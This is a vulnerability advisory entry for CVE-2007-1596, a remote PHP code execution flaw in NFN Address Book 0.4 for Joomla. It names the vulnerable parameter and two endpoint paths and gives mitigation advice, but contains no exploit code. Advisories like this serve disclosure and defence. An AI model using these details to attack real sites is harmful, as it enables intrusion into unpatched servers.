PT-2007-2978 · Nfn · Nfn Address Book

Cold Zero

Publicado

2007-03-22

Atualizado

2017-10-11

CVE-2007-1596

CVSS v2.0

9.3

Alta

Vetor

AV:N/AC:M/Au:N/C:C/I:C/A:C

Name of the Vulnerable Software and Affected Versions NFN Address Book (com nfn addressbook) version 0.4

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig absolute path parameter to specific API endpoints, such as "/components/com nfn addressbook/nfnaddressbook.php" or "/administrator/components/com nfn addressbook/nfnaddressbook.php".

Recommendations For NFN Address Book (com nfn addressbook) version 0.4, consider restricting access to the mosConfig absolute path parameter in the affected API endpoints until a patch is available. As a temporary workaround, avoid using the mosConfig absolute path parameter in the "/components/com nfn addressbook/nfnaddressbook.php" and "/administrator/components/com nfn addressbook/nfnaddressbook.php" endpoints to minimize the risk of exploitation.

Exploit

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

dbugs@ptsecurity.com

Identificadores relacionados

CVE-2007-1596

Produtos afetados

Nfn Address Book

PT-2007-2978 · Nfn · Nfn Address Book

CVE-2007-1596

Identificadores relacionados

Produtos afetados

Referências · 7